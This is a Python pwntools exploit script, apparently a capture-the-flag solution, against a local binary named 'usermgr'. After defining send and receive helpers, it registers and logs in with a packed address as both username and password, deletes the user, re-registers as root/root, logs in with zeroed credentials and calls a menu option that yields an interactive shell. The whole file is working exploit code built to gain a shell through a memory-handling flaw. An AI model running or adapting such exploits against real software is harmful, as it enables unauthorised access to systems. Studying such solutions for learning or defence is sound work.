from pwn import *
# Target process setup: debug-level logging prints every byte sent/received,
# and the tube is configured for a 64-bit Linux binary.
context(log_level='debug', os='linux', arch='amd64')
context.terminal = ["tmux", "splitw", "-h"]
io = process("./usermgr")
# io = remote("", )   # alternative target, left disabled in the original
# gdb.attach(io)


def se(data):
    """Send raw data to the tube."""
    return io.send(data)


def sa(delim, data):
    """Wait for ``delim`` to appear, then send ``data`` (no newline appended)."""
    return io.sendafter(delim, data)


def sl(data):
    """Send ``data`` followed by a newline."""
    return io.sendline(data)


def sla(delim, data):
    """Wait for ``delim``, then send ``data`` followed by a newline."""
    return io.sendlineafter(delim, data)


def rc(num):
    """Receive up to ``num`` bytes."""
    return io.recv(num)


def rl():
    """Receive one line."""
    return io.recvline()


def ru(delims):
    """Receive until ``delims`` is seen."""
    return io.recvuntil(delims)


def uu32(data):
    """Unpack a little-endian u32 from ``data``, zero-padding it to 4 bytes first."""
    return u32(data.ljust(4, b'\x00'))


def uu64(data):
    """Unpack a little-endian u64 from ``data``, zero-padding it to 8 bytes first."""
    return u64(data.ljust(8, b'\x00'))


def ia():
    """Hand the tube over to the user."""
    return io.interactive()


def get_64():
    """Read until a 0x7f byte and unpack the trailing 6 bytes as a u64."""
    tail = io.recvuntil(b'\x7f')[-6:]
    return u64(tail.ljust(8, b'\x00'))


def get_32():
    """Read until an 0xf7 byte and unpack the trailing 4 bytes as a u32."""
    tail = io.recvuntil(b'\xf7')[-4:]
    return u32(tail.ljust(4, b'\x00'))
def sign_up(username, password):
    """Drive menu option 1 (register): answer the username and password prompts.

    Both values are sent with ``sa`` (no trailing newline) so that they reach
    the program exactly as given.
    """
    sla("> ", "1")
    for prompt, value in (("username:", username), ("password:", password)):
        sa(prompt, value)
def sign_in(username, password):
    """Drive menu option 2 (login): answer the username and password prompts.

    Original author's note (translated): if only 8 bytes can be sent, do not
    use ``sla`` here -- ``sa`` is used so no newline is appended to the value.
    """
    sla("> ", "2")
    for prompt, value in (("username:", username), ("password:", password)):
        sa(prompt, value)
def remove():
    """Select menu option 3 at the next prompt."""
    io.sendlineafter("> ", "3")
def get_shell():
    """Select menu option 4 at the next prompt."""
    io.sendlineafter("> ", "4")
# 8-byte little-endian value used as both username and password in the first
# round; the constant is taken from the original script, its meaning is not
# established anywhere in this file.
fake_addr = p64(0x403eb8)
# pause()
first_round = (fake_addr, fake_addr)
sign_up(*first_round)
sign_in(*first_round)
remove()
# Second round: plain-text credentials, then an all-zero 8-byte login.
sign_up("root", "root")
zero_qword = p64(0)
sign_in(zero_qword, zero_qword)
get_shell()
io.interactive()